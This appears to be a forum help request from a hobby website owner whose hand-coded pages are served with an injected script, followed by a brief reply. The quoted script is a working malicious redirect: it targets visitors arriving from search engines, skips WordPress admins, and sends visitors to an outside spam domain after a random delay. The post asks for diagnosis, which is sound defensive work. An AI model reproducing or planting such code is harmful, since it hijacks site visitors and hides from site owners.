I've got a simple hobby website - www.stuartconner.me.uk - where I've largely hand-coded the HTML (as a learning exercise) and uploaded to a cheap web hosting platform over FTP.
Pages are occasionally coming from the server with a rogue redirection script added. For example, this line in the .htm file:
<p style="text-align:center"><img src="images/home_page_header.gif" alt="index page header graphic"></p>
... is being received with a script appended to the start of it:
<script>((event) => { var ref = document.referrer || ''; if (ref.length === 0) { return; } ref = ref.toLowerCase(); if (ref.indexOf('google') === -1 && ref.indexOf('bing') === -1) { return; } var cookie = document.cookie || ''; if (cookie.indexOf('wordpress_logged') !== -1 || cookie.indexOf('wp-settings') !== -1 || cookie.indexOf('wordpress_test') !== -1) { return; } if (cookie.indexOf('wordpress-test') !== -1) { return; } function generateRandomInteger(min, max) { return Math.floor(min + Math.random()*(max - min + 1)); } document.cookie = "wordpress-test=1; max-age=86400; path=/;"; const delay = generateRandomInteger(2000, 6000); setTimeout(() => { window.location.replace('http://offers25942.xyz/'); }, delay);})();</script>
The affected files that I uploaded and sit on the server are fine - if I download them directly using FTP or the Control Panel then there is no sign of that script.
I don't think it's a malware problem on my PC as colleagues have also see the same problem, and it is unlikely that we have all picked up the same malware. Have seen the problem on multiple browsers and multiple devices.
My webhost has checked and assures me there is no malware sitting on their server. There are no files on my website that I don't recognise and don't have the correct file size.
If I google part of the script inserted then it is clear that there are many other websites that also suffer from this problem - but not a single hit that I could see about how it is happening or how to remove it.
Any help to identify the cause and rectify the problem would be appreciated. I'm trying not to move my site to a new web host as most are relatively expensive for the actual features I need.
Just to be sure, these things somtimes are inserted in files with A LOT of white spaces at the start to make it harder to find in editor
Try to run the website in local server too and if you find nothing, just change the hosting
Somthing happenned to me years ago with a wordpress page